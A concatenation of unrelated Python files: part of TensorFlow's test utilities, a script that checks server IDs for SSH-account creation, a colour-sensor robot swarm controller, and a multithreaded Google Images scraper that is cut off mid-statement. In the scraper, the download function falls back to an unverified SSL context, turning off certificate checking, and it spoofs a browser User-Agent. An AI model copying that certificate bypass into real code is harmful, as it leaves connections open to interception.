open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
    if not isinstance(target, list):
      arrays = [target]
    else:
      arrays = target
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
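  # Hedged usage sketch (editor addition): the predicate form lets a test
  # inspect the raised exception object itself; `flaky_op` below is a
  # hypothetical callable used only for illustration.
  #
  #   with self.assertRaisesWithPredicateMatch(
  #       ValueError, lambda e: "must be rank 2" in str(e)):
  #     flaky_op()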
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
if not six.PY2:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
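# Hedged usage sketch (editor addition): looking up a node by name in a
# GraphDef. "MatMul" is a hypothetical node name and `graph` a hypothetical
# tf.Graph instance, used only for illustration.
#
#   node = get_node_def_from_graph("MatMul", graph.as_graph_def())
#   if node is not None:
#     print(node.op, node.input)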
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
  assert graph.graph_def_versions.producer == producer_version
@contextlib.contextmanager
def _fake_gradient_tape_context_manager():
"""tf.gradients(...) implemented as tf.GradientTape context manager interface.
This is useful to test tf.gradients() in tests that uses tf.GradientTape().
Yields:
gradient tape instance that's implemented by tf.gradients() underneath.
"""
try:
class FakeGradientTape:
def watch(self, x):
pass
def gradient(self, y, x, grad_ys=None):
result = gradients_impl.gradients(y, x, grad_ys)
# Unlike `tape.gradient()`, `tf.gradients()` returns a list for a single
# element. So unpack if needed to match `tape.gradient()` behavior.
if not isinstance(x, (list, tuple)):
assert len(result) == 1
return result[0]
return result
yield FakeGradientTape()
finally:
pass
class AbstractGradientTape:
"""Abstract GradientTape context manager that has multiple implementations.
This is useful to test both tf.GradientTape() and tf.gradients() without
duplicating tests.
"""
def __init__(self, use_tape, persistent=False):
self._use_tape = use_tape
self._persistent = persistent
def __enter__(self):
if self._use_tape:
self._tape_impl = backprop.GradientTape(persistent=self._persistent)
else:
self._tape_impl = _fake_gradient_tape_context_manager()
return self._tape_impl.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
self._tape_impl.__exit__(exc_type, exc_val, exc_tb)
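# Hedged usage sketch (editor addition): the same test body can exercise both
# tf.GradientTape and tf.gradients by toggling `use_tape` (typically a test
# parameter); `x` here is a hypothetical tensor.
#
#   with AbstractGradientTape(use_tape=use_tape) as tape:
#     tape.watch(x)
#     y = x * x
#   dy_dx = tape.gradient(y, x)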
@contextlib.contextmanager
def run_functions_eagerly(run_eagerly):
"""Runs functions eagerly if `run_eagerly` is true.
WARNING: Setting `run_eagerly` to True in tests running in V1 graph mode
*WILL NOT* make the tf.function run eagerly because eager is disabled by
default in V1. Instead, tf.function will run as a traced graph function.
Ensures that the state (for running functions eagerly) is back to the initial
`def_function.RUN_FUNCTIONS_EAGERLY` state.
Args:
run_eagerly: Boolean determining whether to run the function eagerly or not.
Raises:
ValueError if `run_eagerly` is not a boolean.
Yields:
Nothing.
"""
if not isinstance(run_eagerly, bool):
raise ValueError(
"Expected bool for `run_eagerly` but got {}".format(run_eagerly))
is_eager = context.executing_eagerly()
if not is_eager and run_eagerly:
logging.warning(
"Running tf.function eagerly in V1 graph mode is not supported. "
"tf.function will be run as a traced graph function.")
initial_state = def_function.functions_run_eagerly()
def_function.run_functions_eagerly(run_eagerly)
try:
yield
finally:
def_function.run_functions_eagerly(initial_state)
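# Hedged usage sketch (editor addition): temporarily force tf.function to run
# eagerly (e.g. to step through Python code in a debugger); the previous
# setting is restored when the block exits. `my_fn` and `x` are hypothetical.
#
#   with run_functions_eagerly(True):
#     result = my_fn(x)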
|
check-serverid.py
|
import os
import app
import json
import threading
def real_path(file_name):
return os.path.dirname(os.path.abspath(__file__)) + file_name
def main():
app.log('Checking serverid', status=None)
data_create_ssh_temp = [
{
"link": "",
"head": "",
"post": "",
"page": "",
"pattern-class": "",
"pattern-serverid": "",
"pattern-hostname": "",
"replace-username": "",
"replace-password": ""
}
]
ssh_create = app.ssh_create(verbose=True)
ssh_create.accounts = app.generate_accounts(json.loads(open(real_path('/database/accounts.json')).read())['accounts'])
# ssh_create.data_create_ssh = data_create_ssh_temp
threads = []
for data in ssh_create.data_create_ssh:
threads.append(threading.Thread(target=ssh_create.update_serverid_thread, args=(data, )))
for thread in threads:
thread.daemon = True
thread.start()
try:
for thread in threads:
thread.join()
except KeyboardInterrupt: pass
app.log('Checking serverid complete \n', status=None)
if __name__ == '__main__':
main()
|
SwarmMaster.py
|
from hardware.communication.ZMQ import ZMQExchange
from hardware.communication.TCP import TCP
from threading import Thread
from peripherals.colorsensor import ColorSensor
import time
threads = []
count = {"F":0,"B":0,"L":0,"R":0}
def run(bot):
# Sets up TCP connection between master and minions. Starts publisher-side
# connection.
# always set the mediator first
z = ZMQExchange()
z.setMediator()
z.setBroadcaster()
TCP.tcp.send_to_basestation("SwarmIP", z.getIP("wlan0"))
mediateThread = Thread(target=z.mediate)
mediateThread.start()
threads.append(mediateThread)
#echobot(bot,z)
colorbot(bot,z)
def colorbot(bot,z):
speed = 10
cs = bot.get_sensor_by_name("ColorSensor")
cs.calibrate()
pinkFirstTime = True
orangeFirstTime = True
try:
  msg = (0, 0)  # default to "stop" so the first broadcast is defined even if no known color is read yet
  while(True):
c = cs.read_color()
if(c=="RED"):
# stop
msg = (0,0)
count["F"]=0
count["B"]=0
count["L"]=0
count["R"]=0
speed = 10
elif(c=="GREEN"):
# forwards
count["F"]+=1
count["B"]=0
count["L"]=0
count["R"]=0
speed = increment_speed("F",3,speed,15)
msg = (speed,speed)
elif(c=="BLUE"):
# backwards
count["F"]=0
count["B"]+=1
count["L"]=0
count["R"]=0
speed = increment_speed("B",3,speed,15)
msg = (-speed,-speed)
elif(c=="YELLOW"):
# turn left
count["F"]=0
count["B"]=0
count["L"]+=1
count["R"]=0
speed = increment_speed("L",3,speed,15)
msg = (-speed,speed)
elif(c=="VIOLET"):
# turn right
count["F"]=0
count["B"]=0
count["L"]=0
count["R"]+=1
speed = increment_speed("R",3,speed,15)
msg = (speed,-speed)
z.broadcast(msg)
time.sleep(0.2)
finally:
cleanup(z)
def increment_speed(direction, inc_time, speed, inc_amt):
""" Given a direction, increments the speed after inc_time amount of seconds by
inc_amt increase of power to the motors.
"""
if(count[direction]>(inc_time*5)):
count[direction] = 0
if(speed<50):
speed += inc_amt
print("Speed increased: " + str(speed))
return speed
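# Hedged usage sketch (editor addition): colorbot() sleeps 0.2 s per loop, so
# count increases about 5 times per second; inc_time seconds therefore map to
# the inc_time * 5 threshold above, after which the speed is bumped by
# inc_amt while it is still below 50.
#
#   speed = increment_speed("F", inc_time=3, speed=10, inc_amt=15)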
def echobot(bot,z):
try:
while(True):
# msg is a tuple of left motor and right motor, respectively.
msg = bot.get_actuator_by_name("two_wheel_movement").get_value()
print("MSG: " + msg)
z.broadcast(msg)
time.sleep(0.1)
if not TCP.tcp.isConnected():
break
finally:
cleanup(z)
def cleanup(z):
for t in threads:
t.join(0.1)
z.stopZMQExchange()
|
batch_it_crazy.py
|
# In[ ]:
# coding: utf-8
###### Searching and Downloading Google Images to the local disk ######
# Import Libraries
import time # Importing the time library to check the time of code execution
import sys # Importing the System Library
import os
import argparse
import ssl
import pathlib
import traceback
import requests
from bs4 import BeautifulSoup
from threading import Thread
import threading
from queue import Queue
import datetime
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
# urllib library for Extracting web pages
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError  # URLError/HTTPError are documented in urllib.error
from urllib.parse import quote
else: # If the Current Version of Python is 2.x
# urllib library for Extracting web pages
from urllib2 import Request, urlopen
from urllib2 import URLError, HTTPError
from urllib import quote
import urllib2
link_queue = Queue()
data_write_queue = Queue(maxsize=1000)
url_params = {'color':
{'gray':'ic:gray',
'rgb':'ic:color'},
'usage_rights':
{'labled-for-reuse-with-modifications':'sur:fmc','labled-for-reuse':'sur:fc',
'labled-for-noncommercial-reuse-with-modification':'sur:fm',
'labled-for-nocommercial-reuse':'sur:f'},
'size':
{'large':'isz:l',
'medium':'isz:m',
'icon':'isz:i'},
'type':
{'face':'itp:face',
'photo':'itp:photo',
'clip-art':'itp:clip-art',
'line-drawing':'itp:lineart',
'animated':'itp:animated'},
'time':{'past-24-hours':'qdr:d',
'past-7-days':'qdr:w'}
}
# Downloading entire Web Document (Raw Page Content)
def download_page(url):
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
import urllib.request # urllib library for Extracting web pages
try:
headers = {}
headers[
'User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers=headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: # If the Current Version of Python is 2.x
try:
headers = {}
headers[
'User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers=headers)
try:
response = urllib2.urlopen(req)
except URLError: # Handling SSL certificate failed
context = ssl._create_unverified_context()
response = urlopen(req, context=context)
page = response.read()
return page
except:
return "Page Not found"
def _download_page(url):
    # requests already decodes the body for us via `.text`; the previous
    # `req.content.encode('utf-8')` failed because `.content` is already bytes.
    req = requests.get(url)
    return req.text
def _fetch_image_links(html):
soup = BeautifulSoup(html, 'html.parser')
links = soup.find_all('a', href=True)
links = [a['href'] for a in links]
return links
# Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: # If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"', start_line + 1)
end_content = s.find(',"ow"', start_content + 1)
content_raw = str(s[start_content + 6:end_content - 1])
return content_raw, end_content
# Getting all links with the help of '_images_get_next_image'
def _images_get_all_links(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) # Append all the links in the list named 'Links'
time.sleep(0.1) # Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
#Building URL parameters
def build_url_parameters(**kwargs):
built_url = "&tbs="
params = []
for key, value in kwargs.items():
param = url_params[key][value]
params.append(param)
return built_url + ','.join(params)  # e.g. "&tbs=ic:gray,isz:l"
# build the URL for Google
def _build_url(search_term, engine='google', params=''):
url = 'https://www.google.com/search?q={0}&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch{1}&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
# add the keyword to the URL
url = url.format(search_term, params)
return url
def type_check(v, o):
if not isinstance(v, o):
# get the stack trace so we can get the name of the variable
stack = traceback.extract_stack()
# get the name of this function (just in case it gets changed in the future)
(_, _, function_name, _) = stack[-1]
# get the text that was typed for this call
(_, _, _, text) = stack[-2]
# parse the variable names from the text
# - now it's "type_check(my_var, str)"
# - but can be "x = [type_check(y, int) for y in my_list]"
# - so we need to make the string parsing robust to account for the variations
vars = text.split('%s(' % function_name)[1]
vars = [var.strip() for var in vars.split(')')[0].split(',')]
var_name = vars[0]
type_name = vars[1]
# now we get to raise the error... finally!
raise ValueError('Invalid type: Variable "{}" must be of type {}.'.format(var_name, type_name))
def _build_urls(keywords, addendums, **kwargs):
urls = []
params = build_url_parameters(**kwargs)
for category, terms in keywords.items():
# build keywords + addendums and create all their URLs
for term in terms:
search_terms = [('"%s": %s' % (addendum, term)).replace(':', '%3A').replace(' ', '+') for addendum in addendums]
_urls = [_build_url(search_term, params=params) for search_term in search_terms]
_urls = [(category, url) for url in _urls]
urls += _urls
return urls
def _get_all_links(url_batch, verbose=False):
links = set()
t_name = threading.current_thread().name
for category, url in url_batch:
# fetch html
html = download_page(url)
new_links = _images_get_all_links(html)
num_links_added = 0
# this makes sure that all the links are unique
for link in new_links:
if link not in links:
num_links_added += 1
links.add(link)
link_queue.put((category, links))
link_queue.task_done()
if verbose:
print('%s [%s]: %d links added' % (t_name, category, num_links_added))
def _get_unique_links(kw_links, cross_filter, verbose=False):
t_name = threading.current_thread().name
category_links = {}
filtered_category_links = []
num_links_removed = 0
for category, links in kw_links:
if category not in category_links:
category_links[category] = {}
for link in links:
if link not in category_links[category]:
category_links[category][link] = 1
else:
category_links[category][link] += 1
# perform category cross-filtering
if cross_filter == 'None':
for category in category_links.keys():
for link in category_links[category].keys():
filtered_category_links.append((category, link))
elif cross_filter == 'Count':
categories = list(category_links.keys())
for i, category in enumerate(categories[:-1]):
other_categories = categories[i + 1:]
# iterate over each link in this category
for curr_link, curr_link_count in category_links[category].items():
keep_link = True
# iterate over each other category and look for this link
for other_category in other_categories:
if curr_link in category_links[other_category]:
other_link_count = category_links[other_category][curr_link]
# LOSE: dont keep this link
if curr_link_count < other_link_count:
keep_link = False
num_links_removed += 1
break
# TIE: dont keep any links
elif curr_link_count == other_link_count:
del category_links[other_category][curr_link]
keep_link = False
num_links_removed += 2
break
# WIN: remove the other link
else:
num_links_removed += 1
del category_links[other_category][curr_link]
if keep_link:
filtered_category_links.append((category, curr_link))
elif cross_filter == 'Strict':
categories = list(category_links.keys())
for i, category in enumerate(categories[:-1]):
other_categories = categories[i + 1:]
# iterate over each link in this category
for link in category_links[category].keys():
keep_link = True
# iterate over each other category and look for this link
for other_category in other_categories:
if link in category_links[other_category]:
keep_link = False
del category_links[other_category][link]
num_links_removed += 2
if keep_link:
filtered_category_links.append((category, link))
else:
raise ValueError('\'{}\': Invalid argument for cross_filter parameter.'.format(cross_filter))
if verbose:
print('%s cross_filter=%s: %d links removed' % (t_name, cross_filter, num_links_removed))
return filtered_category_links
def _write_data_thread(verbose=False):
t_name = threading.current_thread().name
while True:
directory, data = data_write_queue.get()
file_id = len(os.listdir(directory))
filename = '%d.jpg' % file_id
filename = os.path.join(directory, filename)
output_file = open(filename, 'wb')
output_file.write(data)
output_file.close()
data_write_queue.task_done()
if verbose:
print('%s >>> [%s] file %d written!' % (t_name, os.path.basename(directory), file_id))
def _fetch_images(links, out_dir, log_out_dir, verbose=False):
t_name = threading.current_thread().name
log_filename = time.strftime('log-{} %d-%m-%Y %H-%M.txt', time.localtime()).format(t_name)
log_filename = os.path.join(log_out_dir, log_filename)
logfile = open(log_filename, 'w')
logfile.write('Image Count,Status,Url,FileName,Message\n')
supported_formats = ('.jpg', '.jpeg', '.png', '.svg')
for i, (category, link) in enumerate(links):
image_name = ''
try:
req = Request(link, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
response = urlopen(req, None, 15)
image_name = str(link[(link.rfind('/')) + 1:])
if '?' in image_name:
image_name = image_name[:image_name.find('?')]
ext = os.path.splitext(image_name)[-1]
if ext in supported_formats:
# get data stream
data = response.read()
category_dir = os.path.join(out_dir, category)
data_write_queue.put((category_dir, data))
#write_queue.task_done()
response.close()
log_message = '%d,downloaded,%s,%s,\n' % (i+1, link, image_name)
if verbose:
print('%s (%d) downloaded: %s' % (t_name, i+1, image_name))
else:
log_message = "%d,Exception,,,InvalidExtension: '%s' is not a supported image format. Supported formats %s\n" \
% (i+1, ext, str(supported_formats))
if verbose:
print('%s (%d) [Exception] UnsupportedExtension: %s' % (t_name, i+1, ext))
except Exception as e:
error_name = str(type(e)).split('\'')[1]
error_message = str(e)
image_name = 'N/A' if image_name == '' else image_name
log_message = "%d,Exception,%s,%s,%s: %s\n" % (i, link, image_name, error_name, error_message)
if verbose:
print('%s (%d) [Exception] %s: %s' % (t_name, i+1, error_name, error_message))
print('\tLink: %s\n\tImg Name: %s' % (link, image_name))
logfile.write(log_message)
logfile.close()
def _create_batches(data, num_batches=20):
type_check(data, list)
num_threads = min(num_batches, len(data))
batch_size = int(len(data) / num_threads)
batches = []
while len(data) > 0:
batch = data[:batch_size]
data = data[batch_size:]
batches.append(batch)
return batches
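# Hedged usage sketch (editor addition): batch_size is computed with integer
# division, so slightly more than num_batches batches may come back when the
# split is not exact.
#
#   _create_batches(list(range(10)), num_batches=4)
#   # -> batch_size = int(10 / 4) = 2, giving 5 batches of 2 items each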
def go_go_batch_it(keywords, addendums=None, out_dir='output', log_out_dir='logs',
verbose=False, num_threads=20, cross_filter='Count', **kwargs):
if verbose:
print('initializing Batch-It')
print('validating parameters...')
# init_time
init_t = time.time()
output_dirs = {}
# check that the out_dir is a path
if not os.path.isdir(out_dir):
raise ValueError('Invalid Argument: Variable "out_dir" must be a directory.')
for key in keywords.keys():
d = os.path.join(out_dir, key)
if not os.path.isdir(d):
os.mkdir(d)
output_dirs[d] = len(os.listdir(d))
if not os.path.isdir(log_out_dir):
os.mkdir(log_out_dir)
# check that the keyword parameter is of type list
type_check(keywords, dict)
for key, value in keywords.items():
type_check(key, str)
type_check(value, list)
for elem in value:
type_check(elem, str)
# verify cross_filter
if cross_filter not in ('None', 'Count', 'Strict'):
err_message = '\'{}\': Invalid argument for cross_filter. Must be one of {}'.format(cross_filter, ('None', 'Count', 'Strict'))
raise ValueError(err_message)
# repeat the checking process for addendums if it's not None
if addendums is not None:
type_check(addendums, list)
for addendum_elems in addendums:
type_check(addendum_elems, str)
else:
# this makes it easier for later
addendums = []
if verbose:
print('%d categories found' % len(keywords.keys()))
print('building urls...')
urls = _build_urls(keywords, addendums)
batches = _create_batches(urls, num_batches=num_threads)
# spin up threads to get ALL UNIQUE LINKS (this is unique per category)
if verbose:
print('%d urls created' % len(urls))
print('spinning up LinkFetcher threads...')
threads = [Thread(target=_get_all_links, name='t-[LinkFetcher %d]' % (i+1), args=(batch, verbose))
for i, batch in enumerate(batches)]
for t in threads:
if verbose:
print('starting %s' % t.name)
t.start()
for t in threads:
t.join()
links = []
while not link_queue.empty():
links.append(link_queue.get())
# _get_unique_links & cross_filter will compare links between categories
# cross_filter='None' will not perform any cross-category filtering
# cross_filter='Count' will filter out links in categories if their link count is lower than another category's
# cross_filter='Strict' will throw out any links which are present in 2 or more categories
links = _get_unique_links(links, cross_filter=cross_filter, verbose=verbose)
if verbose:
print('%d links found' % len(links))
print('batching links & spinning up download threads...')
# Now batch up the links
batches = _create_batches(links, num_threads)
# create write thread
write_t = Thread(target=_write_data_thread, name='t-[write]', args=(verbose,))
write_t.start()
# create threads to fetch images
threads = [Thread(target=_fetch_images, name='t-[Downloader %d]' % (i+1), args=(batch, out_dir, log_out_dir,verbose))
